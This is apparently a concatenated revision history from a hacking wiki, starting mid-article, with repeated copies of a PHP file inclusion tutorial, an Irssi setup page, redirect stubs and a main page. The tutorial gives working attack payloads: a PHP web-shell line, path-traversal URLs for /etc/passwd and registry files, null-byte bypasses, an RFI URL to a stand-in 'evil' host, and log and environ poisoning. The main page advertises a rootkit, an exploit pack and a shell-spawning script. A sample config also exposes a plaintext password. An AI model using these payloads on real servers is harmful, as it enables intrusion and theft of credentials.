Because the file is being included, this means that the attacker can see it if it is a text file, or execute any [[PHP|php]] inside of it.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" header and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if a browser sends a user-agent string containing [[PHP|PHP]] code:<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
They can retrieve the [[Linux]] or Unix username (output of the whoami command) in the return [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<source lang="php"><br />
GET <?php system($_GET['cmd']) ?><br />
</source><br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7653File Inclusion2012-06-28T20:07:17Z<p>DPYJulietowbaijc: </p>
<hr />
<div>File inclusion refers to the process of manipulating the include() function into including files that were not intended to be included, whether this is for the disclosure of privileged information (such as disclosing the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
This function does not merely include a library file as one would in [[C]]; it executes the included code as well. <br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]].<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
and then gain access to every single username and [[password]] (or [[password]] hash) that is stored in the [[database]]. This can also allow for remote code execution as well as the spawning of a remote shell.<br />
<br />
{{notice|This is known as Remote File Inclusion or RFI.}}<br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous, if not more so. It occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, but '''allow_url_fopen''' and '''allow_url_include''' have been disabled in the [[PHP]] configuration, so the attacker can only include files on the local machine:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]], but reviewing the code shows that [[PHP|PHP]] now reads a file on the local machine and displays it in the web page. The problem with this code is that, while the [[programmer]] is no longer handing execute, write and read permissions to an attacker, read permission has still been relinquished: the attacker can specify any file on the remote host that the [[PHP|PHP]] server has permission to read, and that file will be displayed in the web page. For example, the file that contains the registry on Windows is ntusers.dat in the Windows directory. The attacker may request the URL:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net in the attacker’s web browser. The attacker can then use the information gleaned from the registry to gather username and [[password]] hash combinations and begin cracking them. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is being included, this means that the attacker can see it if it is a text file, or execute any [[PHP|php]] inside of it.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" header and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if a browser sends a user-agent string containing [[PHP|PHP]] code:<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
They can retrieve the [[Linux]] or Unix username (output of the whoami command) in the return [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<source lang="php"><br />
GET <?php system($_GET['cmd']) ?><br />
</source><br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Irssi_Tutorial&diff=7497Irssi Tutorial2012-06-16T22:10:34Z<p>DPYJulietowbaijc: /* Sample config file */</p>
<hr />
<div>==Getting Irssi==<br />
* Begin by downloading Irssi from [http://irssi.org/download the Irssi download page].<br />
**Mac users can download Irssi [http://pdb.finkproject.org/pdb/package.php/irssi here] and Windows users [http://irssi.org/files/irssi-win32-0.8.12.exe here]<br />
<br />
===Debian/Ubuntu===<br />
<pre>sudo apt-get install irssi</pre><br />
<br />
===Gentoo===<br />
<pre>emerge irssi</pre><br />
<br />
===Slackware===<br />
<pre>slackware-current</pre><br />
<br />
===Frugalware===<br />
<pre>pacman -S irssi</pre><br />
<br />
===Solaris===<br />
<pre>pkg-get install irssi</pre><br />
<br />
===Arch Linux===<br />
<pre>pacman -S irssi</pre><br />
<br />
==Connecting to IRC==<br />
<br />
<pre>irssi<br />
/connect -ssl irc.blackhatacademy.org<br />
/join #CSIII</pre><br />
<br />
== Sample config file ==<br />
<pre><br />
servers = (<br />
{<br />
address = "irc.blackhatacademy.org";<br />
chatnet = "bha";<br />
port = "6697";<br />
autoconnect = "yes";<br />
use_ssl = "yes";<br />
ssl_verify = "no";<br />
}<br />
);<br />
<br />
chatnets = {<br />
bha = {<br />
type = "IRC";<br />
nick = "Savitri";<br />
user = "arya";<br />
realname = "Llama Llama Duck";<br />
autosendcmd = "SBCONNECT";<br />
};<br />
};<br />
<br />
channels = (<br />
{ name = "#CSIII"; chatnet = "bha"; autojoin = "Yes"; },<br />
{ name = "#bha-wiki"; chatnet = "bha"; autojoin = "Yes"; }<br />
);<br />
<br />
aliases = {<br />
J = "join";<br />
WJOIN = "join -window";<br />
WQUERY = "query -window";<br />
LEAVE = "part";<br />
BYE = "quit";<br />
EXIT = "quit";<br />
SIGNOFF = "quit";<br />
DESCRIBE = "action";<br />
DATE = "time";<br />
HOST = "userhost";<br />
LAST = "lastlog";<br />
SAY = "msg *";<br />
WI = "whois";<br />
WII = "whois $0 $0";<br />
WW = "whowas";<br />
W = "who";<br />
N = "names";<br />
M = "msg";<br />
T = "topic";<br />
C = "clear";<br />
CL = "clear";<br />
K = "kick";<br />
KB = "kickban";<br />
KN = "knockout";<br />
BANS = "ban";<br />
B = "ban";<br />
MUB = "unban *";<br />
UB = "unban";<br />
IG = "ignore";<br />
UNIG = "unignore";<br />
SB = "scrollback";<br />
UMODE = "mode $N";<br />
WC = "window close";<br />
WN = "window new hide";<br />
SV = "say Irssi $J ($V) - http://irssi.org/";<br />
GOTO = "sb goto";<br />
CHAT = "dcc chat";<br />
RUN = "SCRIPT LOAD";<br />
SBAR = "STATUSBAR";<br />
INVITELIST = "mode $C +I";<br />
SBCONNECT = "MSG starburst USER IDENTIFY Savitri ohnoesmypassw0rdz";<br />
};<br />
</pre><br />
<br />
==References==<br />
*[http://irssi.org/download Irssi download page]<br />
*[http://scripts.irssi.org/ Useful Irssi scripts]<br />
<br />
[[Category:Software]][[Category:Administration]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Irssi_Tutorial&diff=7496Irssi Tutorial2012-06-16T22:09:18Z<p>DPYJulietowbaijc: /* Connecting to the IRC */</p>
<hr />
<div>==Getting Irssi==<br />
* Begin by downloading Irssi from [http://irssi.org/download the Irssi download page].<br />
**Mac users can download Irssi [http://pdb.finkproject.org/pdb/package.php/irssi here] and Windows users [http://irssi.org/files/irssi-win32-0.8.12.exe here]<br />
<br />
===Debian/Ubuntu===<br />
<pre>sudo apt-get install irssi</pre><br />
<br />
===Gentoo===<br />
<pre>emerge irssi</pre><br />
<br />
===Slackware===<br />
<pre>slackware-current</pre><br />
<br />
===Frugalware===<br />
<pre>pacman -S irssi</pre><br />
<br />
===Solaris===<br />
<pre>pkg-get install irssi</pre><br />
<br />
===Arch Linux===<br />
<pre>pacman -S irssi</pre><br />
<br />
==Connecting to IRC==<br />
<br />
<pre>irssi<br />
/connect -ssl irc.blackhatacademy.org<br />
/join #CSIII</pre><br />
<br />
== Sample config file ==<br />
<pre><br />
servers = (<br />
{<br />
address = "irc.blackhatacademy.org";<br />
chatnet = "bha";<br />
port = "6697";<br />
autoconnect = "yes";<br />
use_ssl = "yes";<br />
ssl_verify = "no";<br />
}<br />
);<br />
<br />
chatnets = {<br />
bha = {<br />
type = "IRC";<br />
nick = "Savitri";<br />
user = "arya";<br />
realname = "Llama Llama Duck";<br />
autosendcmd = "SBCONNECT";<br />
};<br />
};<br />
<br />
channels = (<br />
{ name = "#school"; chatnet = "bha"; autojoin = "Yes"; },<br />
{ name = "#wiki"; chatnet = "bha"; autojoin = "Yes"; }<br />
);<br />
<br />
aliases = {<br />
J = "join";<br />
WJOIN = "join -window";<br />
WQUERY = "query -window";<br />
LEAVE = "part";<br />
BYE = "quit";<br />
EXIT = "quit";<br />
SIGNOFF = "quit";<br />
DESCRIBE = "action";<br />
DATE = "time";<br />
HOST = "userhost";<br />
LAST = "lastlog";<br />
SAY = "msg *";<br />
WI = "whois";<br />
WII = "whois $0 $0";<br />
WW = "whowas";<br />
W = "who";<br />
N = "names";<br />
M = "msg";<br />
T = "topic";<br />
C = "clear";<br />
CL = "clear";<br />
K = "kick";<br />
KB = "kickban";<br />
KN = "knockout";<br />
BANS = "ban";<br />
B = "ban";<br />
MUB = "unban *";<br />
UB = "unban";<br />
IG = "ignore";<br />
UNIG = "unignore";<br />
SB = "scrollback";<br />
UMODE = "mode $N";<br />
WC = "window close";<br />
WN = "window new hide";<br />
SV = "say Irssi $J ($V) - http://irssi.org/";<br />
GOTO = "sb goto";<br />
CHAT = "dcc chat";<br />
RUN = "SCRIPT LOAD";<br />
SBAR = "STATUSBAR";<br />
INVITELIST = "mode $C +I";<br />
SBCONNECT = "MSG starburst USER IDENTIFY Savitri ohnoesmypassw0rdz";<br />
};<br />
</pre><br />
<br />
==References==<br />
*[http://irssi.org/download Irssi download page]<br />
*[http://scripts.irssi.org/ Useful Irssi scripts]<br />
<br />
[[Category:Software]][[Category:Administration]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Union_select_injection&diff=7488Union select injection2012-06-16T01:52:20Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection#Basic Injection : Union Select]]<br />
[[Category:Indexing]]<br />
[[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Sql_injection_test_cheat_sheet&diff=7487Sql injection test cheat sheet2012-06-16T01:51:08Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection#Vulnerability testing]]<br />
[[Category:Indexing]][[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Sql_injection_time_based_byte_extraction&diff=7486Sql injection time based byte extraction2012-06-16T01:50:55Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection#Timing-based single-byte exfiltration]]<br />
[[Category:Indexing]][[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Sql_injection_timing_attack_with_boolean_enumeration&diff=7485Sql injection timing attack with boolean enumeration2012-06-16T01:50:42Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection#Expert:_Timing_attacks_for_automated_boolean_enumeration]]<br />
[[Category:Indexing]][[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Sql_injection_with_regular_expressions&diff=7484Sql injection with regular expressions2012-06-16T01:50:29Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection#Using Regular Expressions for Boolean enumeration]]<br />
[[Category:Indexing]][[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Sql_injection_without_commas&diff=7483Sql injection without commas2012-06-16T01:49:59Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection#Testing with Regular Expression Operators (REGEXP, ~, and RLIKE)]]<br />
[[Category:Indexing]]<br />
[[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Sql_injection_without_quotes&diff=7482Sql injection without quotes2012-06-16T01:49:46Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection#Quotes]]<br />
[[Category:Indexing]]<br />
[[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Sql_injection_without_whitespace&diff=7481Sql injection without whitespace2012-06-16T01:49:31Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection#Whitespace filtering]]<br />
[[Category:Indexing]][[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Sql_injection_without_tags&diff=7480Sql injection without tags2012-06-16T01:48:48Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection#Testing with BETWEEN]]<br />
[[Category:Indexing]][[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Steal_cookies&diff=7479Steal cookies2012-06-16T01:48:34Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[Cookies#Stealing_cookies_through_XSS]]<br />
[[Category:Indexing]][[Category:Web exploitation]][[Category:Programming]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Sqli&diff=7478Sqli2012-06-16T01:48:23Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection]]<br />
[[Category:Indexing]]<br />
[[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Stealing_cookies_through_xss&diff=7477Stealing cookies through xss2012-06-16T01:48:11Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[Cookies#Stealing_cookies_through_XSS]]<br />
[[Category:Indexing]]<br />
[[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Test_for_command_injection&diff=7476Test for command injection2012-06-16T01:47:59Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[Command Injection#Testing for Injection]]<br />
[[Category:Indexing]]<br />
[[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Test_for_xss&diff=7475Test for xss2012-06-16T01:47:43Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[XSS#Testing for XSS]]<br />
[[Category:Indexing]]<br />
[[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Main_Page&diff=7474Main Page2012-06-16T01:28:27Z<p>DPYJulietowbaijc: </p>
<hr />
<div>{{info|<center>'''Get involved''' by signing up for and contributing to this wiki, joining [[IRC]] or subscribing to [http://reddit.blackhatacademy.org /r/blackhat]! <br />Brought to you by [http://blackhatacademy.org Blackhat Academy]</center>}}<br />
<br />
<br />
{{social}}<br />
<br />
<table width="100%"><br />
<tr style="vertical-align:top"><br />
<td width="50%"><br />
<table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<br />
<big><big><center>'''Featured Article'''</center></big></big><br />
<br />
----<br />
<br />
{{:Main Page/Featured Article}}</td></tr></table><br />
</td><br />
<td width="50%"><br />
<table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<br />
<big><big><center>'''Featured Tool'''</center></big></big><br />
<br />
----<br />
<br />
{{:Main Page/Featured Tool}}</td></tr></table><br />
</td><br />
</tr><br />
</table><br />
<br />
<br />
<center><table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<center><big>'''Articles'''</big><br />
<br />
----<br />
<br />
'''Exploitation:'''<br />
<br />
[[Buffer overflow|Stack overflows]] &bull; [[SQL injection]] &bull; [[XSS]] &bull; [[Cookies]] &bull; [[File inclusion]] &bull; [[Command Injection|Command injection]] &bull; [[XSCF]] &bull; [[Cold Fusion Hacking|Coldfusion hacking]] &bull; [[Web Exploitation|Web exploitation]]<br />
<br />
'''Programming:'''<br />
<br />
[[Ascii shellcode]] &bull; [[C]] &bull; [[CPP|C++]] &bull; [[Perl]] &bull; [[Python]] &bull; [[LUA]] &bull; [[Polymorphic]] &bull; [[Bash book|The bash book]] &bull; [[SQL Backdoors]]<br />
<br />
<br />
<small>([[:Category:Indexing|The index]])</small></center></td></tr></table></center><br />
<br />
<br />
<br />
{|style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"<br />
!colspan="6" align="center"|<big>'''Tools'''</big><br />
|-<br />
|valign="top"|'''[[Vanguard]]'''<br />
|valign="top"|''[[Web Exploitation|web application vulnerability]] testing engine written in [[perl]] with LibWhisker2 support''<br />
|<br />
|valign="top"|'''[[Jynx2]]'''<br />
|valign="top"|''Version 2.0 of the classic [[LD_Preload]] userland rootkit written in [[C]]''<br />
|-<br />
|valign="top"|'''[[Bleeding Life]]'''<br />
|valign="top"|''[[PHP]] and [[MySQL]] based browser [[buffer overflow]] exploit pack''<br />
|<br />
|valign="top"|'''[[Kolkata]]'''<br />
|valign="top"|''Configurable [[perl]] scanner that analyzes [[cryptography|checksums]] to perform fingerprinting on web applications with static file analysis''<br />
|-<br />
|valign="top"|'''[[GScrape]]'''<br />
|valign="top"|''Google scraper written in [[perl]] for rapidly identifying vulnerable websites and generating statistics''<br />
|<br />
|valign="top"|'''[[Lfi_autopwn.pl]]'''<br />
|valign="top"|''Given a [[File inclusion|file inclusion]] vulnerability, this [[Perl]] script will spawn a shell''<br />
|-<br />
|valign="top"|'''[[MySql 5 Enumeration|Mysql5 enumerator]]'''<br />
|valign="top"|''Automatically map contents or query a remote database given a URL vulnerable to [[SQL injection]] with this [[perl]] script''<br />
|<br />
|valign="top"|'''[http://chokepoint.net/?id=5 Social Network Redirection Utility]'''<br />
|valign="top"|''Rickroll your friends with [[XSCF|content-forged]] image redirects''<br />
<br />
|}</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Main_Page&diff=7473Main Page2012-06-16T01:27:00Z<p>DPYJulietowbaijc: </p>
<hr />
<div>{{info|<center>'''Get involved''' by signing up for and contributing to this wiki, joining [[IRC]] or subscribing to [http://reddit.blackhatacademy.org /r/blackhat]! <br />Brought to you by [http://blackhatacademy.org Blackhat Academy]</center>}}<br />
<br />
<br />
{{social}}<br />
<br />
<table width="100%"><br />
<tr style="vertical-align:top"><br />
<td width="50%"><br />
<table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<br />
<big><big><center>'''Featured Article'''</center></big></big><br />
<br />
----<br />
<br />
{{:Main Page/Featured Article}}</td></tr></table><br />
</td><br />
<td width="50%"><br />
<table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<br />
<big><big><center>'''Featured Tool'''</center></big></big><br />
<br />
----<br />
<br />
{{:Main Page/Featured Tool}}</td></tr></table><br />
</td><br />
</tr><br />
</table><br />
<br />
<br />
<center><table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<center><big>'''Articles'''</big><br />
<br />
----<br />
<br />
'''Exploitation:'''<br />
<br />
[[Buffer overflow|Stack overflows]] &bull; [[SQL injection]] &bull; [[XSS]] &bull; [[Cookies]] &bull; [[File inclusion]] &bull; [[Command Injection|Command injection]] &bull; [[XSCF]] &bull; [[Cold Fusion Hacking|Coldfusion hacking]] &bull; [[Web Exploitation|Web exploitation]]<br />
<br />
'''Programming:'''<br />
<br />
[[Ascii shellcode]] &bull; [[C]] &bull; [[CPP|C++]] &bull; [[Perl]] &bull; [[Python]] &bull; [[LUA]] &bull; [[Polymorphic]] &bull; [[Bash book|The bash book]] &bull; [[SQL Backdoors]]<br />
<br />
<br />
<small>([[Special:AllPages|All Pages]])</small></center></td></tr></table></center><br />
<br />
<br />
<br />
{|style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"<br />
!colspan="6" align="center"|<big>'''Tools'''</big><br />
|-<br />
|valign="top"|'''[[Vanguard]]'''<br />
|valign="top"|''[[Web Exploitation|web application vulnerability]] testing engine written in [[perl]] with LibWhisker2 support''<br />
|<br />
|valign="top"|'''[[Jynx2]]'''<br />
|valign="top"|''Version 2.0 of the classic [[LD_Preload]] userland rootkit written in [[C]]''<br />
|-<br />
|valign="top"|'''[[Bleeding Life]]'''<br />
|valign="top"|''[[PHP]] and [[MySQL]] based browser [[buffer overflow]] exploit pack''<br />
|<br />
|valign="top"|'''[[Kolkata]]'''<br />
|valign="top"|''Configurable [[perl]] scanner that analyzes [[cryptography|checksums]] to perform fingerprinting on web applications with static file analysis''<br />
|-<br />
|valign="top"|'''[[GScrape]]'''<br />
|valign="top"|''Google scraper written in [[perl]] for rapidly identifying vulnerable websites and generating statistics''<br />
|<br />
|valign="top"|'''[[Lfi_autopwn.pl]]'''<br />
|valign="top"|''Given a [[File inclusion|file inclusion]] vulnerability, this [[Perl]] script will spawn a shell''<br />
|-<br />
|valign="top"|'''[[MySql 5 Enumeration|Mysql5 enumerator]]'''<br />
|valign="top"|''Automatically map contents or query a remote database given a URL vulnerable to [[SQL injection]] with this [[perl]] script''<br />
|<br />
|valign="top"|'''[http://chokepoint.net/?id=5 Social Network Redirection Utility]'''<br />
|valign="top"|''Rickroll your friends with [[XSCF|content-forged]] image redirects''<br />
<br />
|}</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Main_Page&diff=7472Main Page2012-06-16T01:26:15Z<p>DPYJulietowbaijc: </p>
<hr />
<div>{{info|<center>'''Get involved''' by signing up for and contributing to this wiki, joining [[IRC]] or subscribing to [http://reddit.blackhatacademy.org /r/blackhat]! <br />Brought to you by [http://blackhatacademy.org Blackhat Academy]</center>}}<br />
<br />
<br />
{{social}}<br />
<br />
<table width="100%"><br />
<tr style="vertical-align:top"><br />
<td width="50%"><br />
<table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<br />
<big><big><center>'''Featured Article'''</center></big></big><br />
<br />
----<br />
<br />
{{:Main Page/Featured Article}}</td></tr></table><br />
</td><br />
<td width="50%"><br />
<table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<br />
<big><big><center>'''Featured Tool'''</center></big></big><br />
<br />
----<br />
<br />
{{:Main Page/Featured Tool}}</td></tr></table><br />
</td><br />
</tr><br />
</table><br />
<br />
<br />
<center><table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<center><big>'''Articles'''</big><br />
<br />
----<br />
<br />
'''Exploitation:'''<br />
<br />
[[Buffer overflow|Stack overflows]] &bull; [[SQL injection]] &bull; [[XSS]] &bull; [[Cookies]] &bull; [[File inclusion]] &bull; [[Command Injection|Command injection]] &bull; [[XSCF]] &bull; [[Cold Fusion Hacking|Coldfusion hacking]] &bull; [[Web Exploitation|Web exploitation]]<br />
<br />
'''Programming:'''<br />
<br />
[[Ascii shellcode]] &bull; [[C]] &bull; [[CPP|C++]] &bull; [[Perl]] &bull; [[Python]] &bull; [[LUA]] &bull; [[Polymorphic]] &bull; [[Bash book|The bash book]] &bull; [[SQL Backdoors]]<br />
<br />
<br />
<small>([[Category:Indexing|The index]])</small></center></td></tr></table></center><br />
<br />
<br />
<br />
{|style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"<br />
!colspan="6" align="center"|<big>'''Tools'''</big><br />
|-<br />
|valign="top"|'''[[Vanguard]]'''<br />
|valign="top"|''[[Web Exploitation|web application vulnerability]] testing engine written in [[perl]] with LibWhisker2 support''<br />
|<br />
|valign="top"|'''[[Jynx2]]'''<br />
|valign="top"|''Version 2.0 of the classic [[LD_Preload]] userland rootkit written in [[C]]''<br />
|-<br />
|valign="top"|'''[[Bleeding Life]]'''<br />
|valign="top"|''[[PHP]] and [[MySQL]] based browser [[buffer overflow]] exploit pack''<br />
|<br />
|valign="top"|'''[[Kolkata]]'''<br />
|valign="top"|''Configurable [[perl]] scanner that analyzes [[cryptography|checksums]] to perform fingerprinting on web applications with static file analysis''<br />
|-<br />
|valign="top"|'''[[GScrape]]'''<br />
|valign="top"|''Google scraper written in [[perl]] for rapidly identifying vulnerable websites and generating statistics''<br />
|<br />
|valign="top"|'''[[Lfi_autopwn.pl]]'''<br />
|valign="top"|''Given a [[File inclusion|file inclusion]] vulnerability, this [[Perl]] script will spawn a shell''<br />
|-<br />
|valign="top"|'''[[MySql 5 Enumeration|Mysql5 enumerator]]'''<br />
|valign="top"|''Automatically map contents or query a remote database given a URL vulnerable to [[SQL injection]] with this [[perl]] script''<br />
|<br />
|valign="top"|'''[http://chokepoint.net/?id=5 Social Network Redirection Utility]'''<br />
|valign="top"|''Rickroll your friends with [[XSCF|content-forged]] image redirects''<br />
<br />
|}</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Main_Page&diff=7471Main Page2012-06-16T01:23:06Z<p>DPYJulietowbaijc: </p>
<hr />
